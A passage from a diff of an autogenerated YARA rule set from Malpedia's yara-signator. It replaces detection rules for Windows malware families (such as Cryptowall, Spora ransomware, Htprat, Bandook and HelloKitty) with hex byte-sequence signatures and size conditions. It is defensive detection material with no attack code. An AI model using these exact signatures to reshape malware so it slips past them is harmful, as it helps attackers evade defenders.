8845fb 8d45fb } - $sequence_12 = { 33c5 8945fc c685fcfffeff00 68ffff0000 } - $sequence_13 = { 8885a0f5ffff 838590f5ffff01 80bda0f5ffff00 75e1 } - $sequence_14 = { 0f2805???????? 0f1145c8 6a00 0f2805???????? 0f1145d8 50 } - $sequence_15 = { 50 8d45f0 64a300000000 c745e000000000 c745fc00000000 837d2000 } + $sequence_0 = { 7d11 48837c242000 7509 b201 33c9 e8???????? 33c0 } + $sequence_1 = { 488b7c2458 488b6c2460 4885f6 744e } + $sequence_2 = { 4533c0 4889742420 488d55f7 ff15???????? } + $sequence_3 = { c744242866730000 4533c0 33d2 48c744242008020000 ff15???????? c605????????01 488bd7 } + $sequence_4 = { 488b7c2430 488b742438 4c8b6c2428 498b442408 } + $sequence_5 = { c3 4c8bdc 4d894318 49895310 53 56 4883ec68 } + $sequence_6 = { 418bc6 81c200040000 4a393400 740c ffc1 48ffc0 483bc2 } + $sequence_7 = { 4889742458 418d5020 48897c2460 ff15???????? 8bf8 85c0 784b } + $sequence_8 = { 4c8bc1 488bc1 6690 66833800 } + $sequence_9 = { 488d05ff500000 c605????????01 488905???????? 488905???????? 4883c420 } condition: - 7 of them and filesize <638976 + 7 of them and filesize <91136 } -rule MALPEDIA_Win_Redpepper_Auto : FILE +rule MALPEDIA_Win_Domino_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "6d36eb39-39c8-5443-a77b-2290277533bd" + id = "eddf3fd4-b67b-5548-8ce8-44ad7e57875e" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.redpepper" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.redpepper_auto.yar#L1-L116" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.domino" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.domino_auto.yar#L1-L123" license_url = "N/A" - logic_hash = "e4e4c0e91e25e59e6fb978e405ca0275203329718b6dc395151e5d470e453248" + logic_hash = "bd7ff729d0491d94e0d98300cebe034f3949530bba7c0c3abfe7de162ca0ef3c" score = 75 quality = 75 tags = "FILE" @@ -152275,32 +155095,32 @@ rule MALPEDIA_Win_Redpepper_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 57 8bf9 8b870c1e0000 85c0 } - $sequence_1 = { 8b500c 41 83f904 8b12 8a540aff } - $sequence_2 = { 8b4d10 881e 50 8901 e8???????? 59 } - $sequence_3 = { 8b4520 3bc7 7439 68a1000000 68???????? 50 e8???????? } - $sequence_4 = { 53 55 56 33f6 57 8b7c2428 } - $sequence_5 = { 752d 689f000000 68???????? 6a26 } - $sequence_6 = { c3 8b7c2418 85ff 7432 e8???????? } - $sequence_7 = { 8845f3 8845f4 8845f7 8845f8 } - $sequence_8 = { 8b742414 6a0f f7d1 49 56 8be9 e8???????? } - $sequence_9 = { e8???????? 8b44241c 8b6c2428 8b4c2418 } + $sequence_0 = { b940000000 488bd8 ff15???????? 4c63c3 } + $sequence_1 = { 8bc6 4881c470010000 415f 415e 415d 415c } + $sequence_2 = { 41b800300000 488bd6 33c9 4c8bf6 ff15???????? } + $sequence_3 = { 498bd0 492bc8 4963c1 4c8d1d622e0000 428a0418 320411 } + $sequence_4 = { 7d07 ffc8 83c8f0 ffc0 48ffc2 } + $sequence_5 = { 4889742410 57 4883ec20 4863fa 488bf1 4885c9 750e } + $sequence_6 = { 488b1a 488bfa 488bf1 8b13 488bce e8???????? } + $sequence_7 = { 895c2420 66899c24b0000000 ff15???????? 85c0 741a 488b4c2458 } + $sequence_8 = { 7f20 488b0b 4885c9 7406 ff15???????? 48832300 83c8ff } + $sequence_9 = { e8???????? 4533c9 448bc7 488bd6 488bcb e8???????? 488b5c2438 } condition: - 7 of them and filesize <2482176 + 7 of them and filesize <50176 } -rule MALPEDIA_Win_Htprat_Auto : FILE +rule MALPEDIA_Win_Allaple_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "67b2e8d9-4f49-5cf6-8afe-0a9a5bcb5d69" + id = "3189c357-03ca-579b-a008-778eac3a8556" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.htprat" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.htprat_auto.yar#L1-L127" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.allaple" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.allaple_auto.yar#L1-L133" license_url = "N/A" - logic_hash = "15d5d8ea42e22569434bb0dbf96f0b13036ea7676d82ad93d8f718afb8dd6a66" + logic_hash = "415071fc213b7748f93f2d59f832b2786979b53afe7fe779d13e0c2bb9460bfe" score = 75 quality = 75 tags = "FILE" @@ -152314,32 +155134,32 @@ rule MALPEDIA_Win_Htprat_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8b8568efffff 03c6 3b8558efffff 7667 8b8394000000 898560efffff 8b8558efffff } - $sequence_1 = { 8bc7 897dcc e8???????? 8b5dc8 3b5f04 740e } - $sequence_2 = { 8d4c2418 c68424e800000003 e8???????? 8b00 3bc3 7504 32db } - $sequence_3 = { 33d2 f3a6 6aff 58 7404 1bd2 1bd0 } - $sequence_4 = { 46 56 8d8d00ffffff e8???????? 53 56 } - $sequence_5 = { 85c0 750c e8???????? a3???????? eb13 53 } - $sequence_6 = { 8b00 8d8d38efffff 51 8d8d08efffff 51 50 ff33 } - $sequence_7 = { 894584 99 f77d8c 8b4590 8a0402 8b5594 } - $sequence_8 = { 83c604 3b7734 75ec eb31 83f805 } - $sequence_9 = { 8d410c 8bcb e8???????? 84c0 0f84d2000000 8b5d0c } + $sequence_0 = { 50 ff75a0 e8???????? 83f8ff 756a e8???????? 3d33270000 } + $sequence_1 = { 7708 2b7b0c 037b14 eb0f 83c328 83c628 } + $sequence_2 = { 6a40 8b55a8 8d4db0 e8???????? 8b55f8 2355f4 8b45f8 } + $sequence_3 = { 6a14 ff7508 57 e8???????? 83c714 c70701000000 83c704 } + $sequence_4 = { 6800800000 6a00 ff75e0 e8???????? eb09 0bc0 7505 } + $sequence_5 = { 55 8bec 83ec24 8955e0 894de4 c745fc00000000 8b45fc } + $sequence_6 = { 894174 8b55fc 8b4278 3345f4 8b4df8 894178 8b55fc } + $sequence_7 = { 0f8539010000 8145f8bc020000 ff75f8 e8???????? 8945f4 ff75fc ff75f4 } + $sequence_8 = { ff45fc 8b45fc 3b4510 7ce5 8be5 5d c3 } + $sequence_9 = { 8b4df8 894178 8b55fc 8b427c 3345f4 8b4df8 89417c } condition: - 7 of them and filesize <278528 + 7 of them and filesize <253952 } -rule MALPEDIA_Win_Karagany_Auto : FILE +rule MALPEDIA_Win_Bandook_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "edc2e98f-b8d5-5230-8689-3d1d2cb2218e" + id = "facf6ec8-b33d-5307-a31b-1f1e19226ca5" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.karagany" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.karagany_auto.yar#L1-L110" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bandook" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.bandook_auto.yar#L1-L133" license_url = "N/A" - logic_hash = "52de418a32cc53d0482440cda283dab56320888d4a5fd4c0281ba321f99401f6" + logic_hash = "d695c77bc8945b310c81d69b92952d60e6bda737f194777e74e4b6ebb23f8272" score = 75 quality = 75 tags = "FILE" @@ -152353,32 +155173,32 @@ rule MALPEDIA_Win_Karagany_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8d85a4fdffff 50 ffd6 68???????? } - $sequence_1 = { 894ddc 894de4 894df0 894df8 894dfc } - $sequence_2 = { 57 8bf8 6a03 57 ffd6 } - $sequence_3 = { 57 8bf8 6a03 57 } - $sequence_4 = { 6800300000 6800000300 6a00 ff15???????? } - $sequence_5 = { 8bf8 6a03 57 ffd6 85c0 } - $sequence_6 = { 8b35???????? 57 8bf8 6a03 } - $sequence_7 = { 6a40 6800300000 6800000300 6a00 ff15???????? } - $sequence_8 = { 6a03 53 ffd6 85c0 } - $sequence_9 = { 57 8bf8 6a03 57 ffd6 85c0 } + $sequence_0 = { 68???????? ffd6 68???????? 6a01 6a00 ff15???????? 68e8030000 } + $sequence_1 = { 8b7c2410 8d442438 50 53 ff15???????? 85c0 0f8529ffffff } + $sequence_2 = { 8d95f8f3ffff 8bce 2bd6 0f1f00 8a01 8d4901 } + $sequence_3 = { ff15???????? ff35???????? ff15???????? 68???????? 68???????? 8d8424a8010000 68???????? } + $sequence_4 = { 8bf9 897da0 8b7308 8d4dbc 897d9c 6a24 68???????? } + $sequence_5 = { 83e103 f3a4 8d442428 50 53 ff15???????? 85c0 } + $sequence_6 = { 51 e8???????? 83c408 837dbc10 8d45a8 0f4345a8 50 } + $sequence_7 = { 88811744c213 84c0 75ed 0fb605???????? f30f7e05???????? a2???????? a1???????? } + $sequence_8 = { c705????????80381713 c705????????003a1713 c705????????c03f1713 c705????????80401713 c705????????c0491713 c705????????704b1713 c705????????30451713 } + $sequence_9 = { 83c40c 8d842498040000 6a64 50 6a07 6800040000 ff15???????? } condition: - 7 of them and filesize <180224 + 7 of them and filesize <23088128 } -rule MALPEDIA_Win_Lyposit_Auto : FILE +rule MALPEDIA_Win_Comlook_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "bce51077-57cf-5adb-b910-01a9e65c59f7" + id = "860e6423-7c42-5b7a-b226-a660c40ee352" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lyposit" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.lyposit_auto.yar#L1-L127" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.comlook" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.comlook_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "6d3a7a695e65723557f6178bebcb83673702ff3e28dbc2c0dd967dcfab1ce86b" + logic_hash = "4752c20623b9cb3b21f01ebe269fa3b02a3d0ecab0d63ba89a5af7bf48ed8b4a" score = 75 quality = 75 tags = "FILE" @@ -152392,32 +155212,32 @@ rule MALPEDIA_Win_Lyposit_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { ff510c 3bc3 0f8cf1000000 57 6a40 ffd6 8945dc } - $sequence_1 = { ff74240c 50 e8???????? a3???????? 59 } - $sequence_2 = { 33f6 8975d8 8975fc b9???????? e8???????? 50 e8???????? } - $sequence_3 = { 6a01 e8???????? 83c40c 397d10 7413 ff7510 } - $sequence_4 = { ff15???????? 8bf8 8975d8 6a04 803e55 7506 8d4601 } - $sequence_5 = { 83c40c 83f801 0f8556010000 015f3c 295f58 807f6c00 } - $sequence_6 = { 0f8479010000 8bd8 8b5768 03573c 8b4760 33f6 } - $sequence_7 = { 29775c 0175fc 837df801 894750 8b475c 743e } - $sequence_8 = { e8???????? 8945c4 8d4de0 51 ff75d0 56 } - $sequence_9 = { 8bfe e8???????? 33c0 eb0f 6a08 6a40 ffd3 } + $sequence_0 = { c1ff1f 03c1 13d7 2b442434 b900000000 1bd1 33ff } + $sequence_1 = { e8???????? 8d45e0 50 c645fc02 e8???????? 83c42c 8bd8 } + $sequence_2 = { ff15???????? 83c404 3bf4 e8???????? b843000000 e9???????? c7854cffffff00000000 } + $sequence_3 = { e8???????? 8b4e08 80791500 7579 8b01 80781401 7509 } + $sequence_4 = { c1ed08 036e04 25ff000000 036c2414 8906 8b0f 0fb6c0 } + $sequence_5 = { e9???????? 8b4518 0b451c 7509 33c0 33d2 e9???????? } + $sequence_6 = { e8???????? 83c408 85c0 7410 8b4508 8b4df8 894858 } + $sequence_7 = { e8???????? 8bf8 83c404 3bfb 0f8eab060000 c7463460210000 895e44 } + $sequence_8 = { e8???????? a1???????? 33c4 89442418 53 8b5c2424 8b435c } + $sequence_9 = { b8cccccccc 8945f0 8945f4 8945f8 8945fc 8b4508 0590050000 } condition: - 7 of them and filesize <466944 + 7 of them and filesize <4553728 } -rule MALPEDIA_Win_Webc2_Rave_Auto : FILE +rule MALPEDIA_Win_Hellokitty_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "ea4a2e95-f571-5243-9ef5-0d9d72800185" + id = "deb7a825-f579-50f4-a7a3-d6eebbf360da" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_rave" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.webc2_rave_auto.yar#L1-L114" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hellokitty" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.hellokitty_auto.yar#L1-L132" license_url = "N/A" - logic_hash = "2cbb2512779b7c01486a2ad87d98dfe34ac5aeaa8fcccabe432ae13b764de599" + logic_hash = "aa8f4a4903065b9814083d80e7b1fe6c3f259f31453cf2a2b84676c3d1765b58" score = 75 quality = 75 tags = "FILE" @@ -152431,32 +155251,32 @@ rule MALPEDIA_Win_Webc2_Rave_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 0f8454010000 8b35???????? 8d542414 6a00 } - $sequence_1 = { 0f84ea000000 8d542414 6a00 52 8d44241a 6a01 } - $sequence_2 = { 56 68???????? 53 52 ffd7 3bc3 894614 } - $sequence_3 = { f7d1 49 3bd9 72e5 } - $sequence_4 = { 8d442418 50 51 e8???????? 85c0 74b1 } - $sequence_5 = { 895c2448 ffd7 3bc3 894610 7517 } - $sequence_6 = { 7418 8b742418 46 4f } - $sequence_7 = { 33c9 33f6 85ed 7e45 8b942414020000 53 } - $sequence_8 = { 03d1 8bca 894c2414 7872 } - $sequence_9 = { e8???????? 83c404 ff15???????? 85ff } + $sequence_0 = { 8975fc 8d4e08 c706???????? e8???????? 6818010000 8d86d0030000 6a00 } + $sequence_1 = { 23df 234df0 8bc7 c1c802 0bd9 33d0 03de } + $sequence_2 = { 7509 0fb64702 3a4604 7411 83c32c 41 83c72c } + $sequence_3 = { 33d2 8b45ec 8bf1 0fa4c11e c1ee02 0bd1 c1e01e } + $sequence_4 = { 8b048520364200 56 8b7508 57 8b4c0818 8b4514 832600 } + $sequence_5 = { 33ca 8bd1 894dec 8988a8000000 33d3 } + $sequence_6 = { 8b759c 03c2 8bd1 8945f8 8bc1 c1c807 c1c20e } + $sequence_7 = { 8b45c0 3175c4 8bf0 0facc81c c1e604 0bd0 c1e91c } + $sequence_8 = { 8bf8 83c020 59 f3a5 8b7508 83ee20 89450c } + $sequence_9 = { c1ce02 8b45d0 03cf 3345ec 3345c4 3345f0 8b7df4 } condition: - 7 of them and filesize <57344 + 7 of them and filesize <319488 } -rule MALPEDIA_Win_Thumbthief_Auto : FILE +rule MALPEDIA_Win_Buhtrap_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "37aaa405-1531-5214-b674-b08465e47533" + id = "25eb4b11-3715-52d0-a7c7-9dac6aa80ccc" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.thumbthief" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.thumbthief_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.buhtrap" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.buhtrap_auto.yar#L1-L162" license_url = "N/A" - logic_hash = "f526be6ecad90c989de9ad949776796071b33db6ed80435843c6bf3aac7a3492" + logic_hash = "d4e0c8ac83aa0b6c13a2f72737ffccb143e82cce7ba2ea9d1a844cc8381c4b50" score = 75 quality = 75 tags = "FILE" @@ -152470,32 +155290,37 @@ rule MALPEDIA_Win_Thumbthief_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { e9???????? 689c000000 b8???????? e8???????? 33db 8d4db4 895dec } - $sequence_1 = { f6431002 0f85e1000000 85f6 0f44f3 89758c b800040000 66854310 } - $sequence_2 = { ffb58cfeffff 8d8d30ffffff e8???????? 8d8de0feffff 807def00 7408 ffb5acfeffff } - $sequence_3 = { f20f1085ecfeffff 8d8574ffffff 51 51 f20f110424 50 8d85f4feffff } - $sequence_4 = { e8???????? c645fc02 8d8d58ffffff e8???????? c645fc03 8d8d18ffffff e8???????? } - $sequence_5 = { bf48030000 8d85a4fcffff 57 6a00 50 e8???????? 83c40c } - $sequence_6 = { eb77 68???????? eb70 68???????? eb69 8bc3 2d04130400 } - $sequence_7 = { ff75f8 85c0 743c ff75f4 ba07000000 8bcf e8???????? } - $sequence_8 = { e8???????? b8???????? e9???????? 8d4ddc e9???????? 8d4dbc e9???????? } - $sequence_9 = { ff15???????? 8b4704 5f 85c0 740a 894508 5d } + $sequence_0 = { 59 59 84c0 0f8435010000 } + $sequence_1 = { 7423 8b44240c 33d2 6a64 59 f7f1 } + $sequence_2 = { c3 b301 ebe1 55 8bec 83ec18 } + $sequence_3 = { 6a00 50 8d442414 c744242c04000000 } + $sequence_4 = { 6a06 8bce e8???????? 8a1d???????? 56 } + $sequence_5 = { 0f8489000000 837d1400 747b 6a09 59 33c0 8d7c242c } + $sequence_6 = { 7405 e8???????? 85f6 7907 32c0 e9???????? 8365f000 } + $sequence_7 = { ffd6 57 ffd6 33c0 85db 0f94c0 5f } + $sequence_8 = { 754e 6a01 53 50 } + $sequence_9 = { 53 68???????? 890e 894604 e8???????? 50 } + $sequence_10 = { 897dfc e8???????? 59 84c0 0f8497000000 3bdf } + $sequence_11 = { 6aff ff742420 ff7624 ffd7 ff742418 e8???????? } + $sequence_12 = { ffd7 6a00 689385e784 6a28 68???????? } + $sequence_13 = { 894624 8b442414 894604 a808 7466 } + $sequence_14 = { 753d 8b4e2c 83c104 e8???????? e8???????? } condition: - 7 of them and filesize <4235264 + 7 of them and filesize <131072 } -rule MALPEDIA_Win_Cryptowall_Auto : FILE +rule MALPEDIA_Win_Doubleback_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "4b008ce5-4135-5555-ab2d-ce0ccd0475ff" + id = "cd786c05-6d47-522c-af3e-e773839ffcc7" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptowall" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.cryptowall_auto.yar#L1-L114" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.doubleback" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.doubleback_auto.yar#L1-L118" license_url = "N/A" - logic_hash = "496e72f17aa4e054ce74cb3a6412cb731c4d48c85c6550891be7fb095dff5a0a" + logic_hash = "b40ea64a869bfecf3f36d9c35b2ecd274734632c8a0bce79f6229d1b07f00bb7" score = 75 quality = 75 tags = "FILE" @@ -152509,32 +155334,32 @@ rule MALPEDIA_Win_Cryptowall_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 85c0 7504 33c0 eb21 0fb74d08 83f961 } - $sequence_1 = { b979000000 66894de6 ba73000000 668955e8 } - $sequence_2 = { e8???????? 83c408 8b0d???????? 898164010000 } - $sequence_3 = { 55 8bec 51 837d0800 7441 837d0c00 } - $sequence_4 = { 7d1f 6a09 6a00 e8???????? } - $sequence_5 = { e8???????? 83c408 8b0d???????? 8901 68f2793618 } - $sequence_6 = { 8b4508 668910 8b4d08 83c102 894d08 eb02 eba1 } - $sequence_7 = { 668955e8 b874000000 668945ea b965000000 } - $sequence_8 = { 7511 6aff 8b4508 50 } - $sequence_9 = { 6a00 6a00 6a40 6a01 6a01 6880000000 } + $sequence_0 = { b9e3050000 eb3b b90b070000 eb34 2d63450000 7428 } + $sequence_1 = { b9ad060000 eb57 b9a7060000 eb50 b947060000 eb49 } + $sequence_2 = { eb3b b90b070000 eb34 2d63450000 } + $sequence_3 = { 3d39380000 741c 3dd73a0000 740e 3dab3f0000 } + $sequence_4 = { b9e7050000 eb42 b9e3050000 eb3b b90b070000 } + $sequence_5 = { b90b070000 eb34 2d63450000 7428 2d57020000 } + $sequence_6 = { 774f 7446 3d00280000 7438 3d5a290000 742a 3d39380000 } + $sequence_7 = { 7438 3d5a290000 742a 3d39380000 } + $sequence_8 = { e8???????? 85c0 7508 c60703 e9???????? } + $sequence_9 = { 7446 3d00280000 7438 3d5a290000 742a 3d39380000 741c } condition: - 7 of them and filesize <417792 + 7 of them and filesize <106496 } -rule MALPEDIA_Win_Evilpony_Auto : FILE +rule MALPEDIA_Win_Sienna_Purple_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "e7d929da-c5f9-5c4e-ba1c-7d2c63753499" + id = "cf85ec2b-384f-56db-af6a-79031e73a14e" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.evilpony" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.evilpony_auto.yar#L1-L131" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sienna_purple" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.sienna_purple_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "02845c899902aea9d270d9fa0c1670211f713972016e6e56c5e914a4d2e0626d" + logic_hash = "ba62dd8b8de50fe0a193f425d94a0b3b25a4b9e54845758b6f1fb176e28dc859" score = 75 quality = 75 tags = "FILE" @@ -152548,34 +155373,34 @@ rule MALPEDIA_Win_Evilpony_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 746e 33c0 6a2d 40 668945f0 58 6a04 } - $sequence_1 = { e8???????? 50 53 e8???????? 83c410 6a23 } - $sequence_2 = { ff15???????? 83f8ff 74d6 8bc7 8b4df8 33cd } - $sequence_3 = { 034df0 03c1 8b4db8 c14da802 8d8401a1ebd96e 8b4dac } - $sequence_4 = { 33f6 ff15???????? 85c0 782c 53 8bc7 e8???????? } - $sequence_5 = { e8???????? c9 c3 55 8bec 83ec18 8b4d08 } - $sequence_6 = { e8???????? 8d855cffffff 50 c7855cffffff94000000 ff15???????? 83bd6cffffff02 7509 } - $sequence_7 = { 56 e8???????? 83c40c 43 5f 5e 8bc3 } - $sequence_8 = { c3 85f6 7436 85ff 7432 53 6a00 } - $sequence_9 = { 39b5f0f7ffff 0f8495000000 39b5e4f7ffff 0f8489000000 6a04 8d9ddcf7ffff c785dcf7ffff1000efbe } + $sequence_0 = { e8???????? 8d4e08 c645fc02 c706???????? e8???????? 8bc6 8b4df4 } + $sequence_1 = { b8e5040000 5e 5d c3 68???????? 56 e8???????? } + $sequence_2 = { e8???????? 50 8d8f84040000 e8???????? b301 8d4db0 c745fcffffffff } + $sequence_3 = { 8d5729 f30f7f4728 f30f6f4310 f30f7f4738 f30f6f4320 f30f7f4748 f30f6f4330 } + $sequence_4 = { ff5014 8d8570ffffff 8bcf 50 68???????? e8???????? 8bce } + $sequence_5 = { f30f6f40f0 660fefc8 f30f7f48f0 3bd1 72c4 8bb540ffffff 8b8d6cffffff } + $sequence_6 = { c1e81f 23c8 8b421c 35ff000000 48 c1e81f 23c8 } + $sequence_7 = { c7072e000000 e9???????? 80be2501000000 7418 8b8d84fdffff e8???????? 50 } + $sequence_8 = { eb09 50 56 8bcb e8???????? 8b4df4 64890d00000000 } + $sequence_9 = { c1c70a 0bc8 8d83dcbc1b8f 034db4 03c1 8b5de8 c1c005 } condition: - 7 of them and filesize <147456 + 7 of them and filesize <2930688 } -rule MALPEDIA_Win_Batel_Auto : FILE +rule MALPEDIA_Win_Hardrain_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "5c784793-7499-59d2-9d6e-e8d3b0a588c6" + id = "97910df3-cc32-519a-be42-e878c516a607" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.batel" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.batel_auto.yar#L1-L228" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hardrain" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.hardrain_auto.yar#L1-L123" license_url = "N/A" - logic_hash = "54d1d1c2accc87182d1d618459ab2c69708bc7f726841a04281db6bdb06903a0" + logic_hash = "e6beb234b33f52448f8a2b08bdea562633ec321b73d43e884a2e68853ad4b784" score = 75 - quality = 73 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -152587,45 +155412,32 @@ rule MALPEDIA_Win_Batel_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 33c0 5b c21000 3b0d???????? 7502 f3c3 } - $sequence_1 = { 56 b858212300 be58212300 57 8bf8 3bc6 } - $sequence_2 = { 7429 68f4202300 56 ff15???????? } - $sequence_3 = { 7cec 56 57 6a40 6800100000 } - $sequence_4 = { 7ccd 5f 5e 5d 33c0 5b c21000 } - $sequence_5 = { c745fc00000000 6800002300 e8???????? 83c404 } - $sequence_6 = { 689d020000 8d8561fdffff 6a00 50 c68560fdffff00 } - $sequence_7 = { 8b1d???????? bf01000000 8d642400 68???????? ff15???????? } - $sequence_8 = { b8???????? 8a10 88940d60fdffff 83c003 } - $sequence_9 = { a1???????? 85c0 752c 8935???????? 68d0202300 } - $sequence_10 = { 40 c20c00 55 8bec 81eca0020000 68ee020000 ff15???????? } - $sequence_11 = { b90b010000 66398818002300 75dd 83b8740023000e 76d4 } - $sequence_12 = { ffd3 68005c2605 ffd5 47 83ff5a 7ccd 5f } - $sequence_13 = { 55 8b2d???????? 56 57 68a00f0000 ffd5 } - $sequence_14 = { 85c0 7412 ffd0 56 } - $sequence_15 = { 59 6a00 ff15???????? 68d8202300 ff15???????? 833d????????00 } - $sequence_16 = { 68a00f0000 ffd5 8b1d???????? bf01000000 } - $sequence_17 = { 50 c68560fdffff00 e8???????? 83c40c 33c9 } - $sequence_18 = { 85f6 7422 68???????? 56 ff15???????? 85c0 7412 } - $sequence_19 = { 6a00 ff15???????? 8bf8 b9a7000000 8db560fdffff f3a5 66a5 } - $sequence_20 = { 6a40 6800100000 689e020000 6a00 ff15???????? } - $sequence_21 = { 83b8740023000e 76d4 33c9 3988e8002300 0f95c1 8bc1 6a02 } - $sequence_22 = { 66a5 ffd0 5f 5e } + $sequence_0 = { 66c74424380000 f3ab 66ab b981000000 33c0 } + $sequence_1 = { 51 56 89542414 8944241c e8???????? 83c410 85c0 } + $sequence_2 = { 8b7c241c 6685ff 7509 5f 83c8ff 5e 83c410 } + $sequence_3 = { ff15???????? 85c0 7eca 8d442430 } + $sequence_4 = { 51 8bce e8???????? 85c0 7427 6a14 } + $sequence_5 = { 68b4000000 52 50 e8???????? } + $sequence_6 = { 8d842484000000 68???????? 50 e8???????? 8d8c248c000000 6800040000 8d942490040000 } + $sequence_7 = { 83c418 c3 33c0 33c9 68b4000000 89442408 } + $sequence_8 = { ff15???????? 8b0e 85c9 7406 8b11 6a01 ff12 } + $sequence_9 = { 81ec0c010000 8b842414010000 8b942418010000 57 89442404 b942000000 } condition: - 7 of them and filesize <49152 + 7 of them and filesize <368640 } -rule MALPEDIA_Win_Spora_Ransom_Auto : FILE +rule MALPEDIA_Win_Blackcoffee_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "8b8ba74c-729e-5b95-8216-285cfd8906d9" + id = "73dd8c3a-f7dc-5a69-bc96-7ac383f83a0a" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.spora_ransom" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.spora_ransom_auto.yar#L1-L127" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackcoffee" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.blackcoffee_auto.yar#L1-L122" license_url = "N/A" - logic_hash = "4f4859e5c4c90863719bd127457464f7d14cd9fd2e5234c00f8157e8748b1142" + logic_hash = "5b61b5b3834a5515967b9008b852cdcc413fc16af2ff85fb0eab8d0101f0945d" score = 75 quality = 75 tags = "FILE" @@ -152639,32 +155451,32 @@ rule 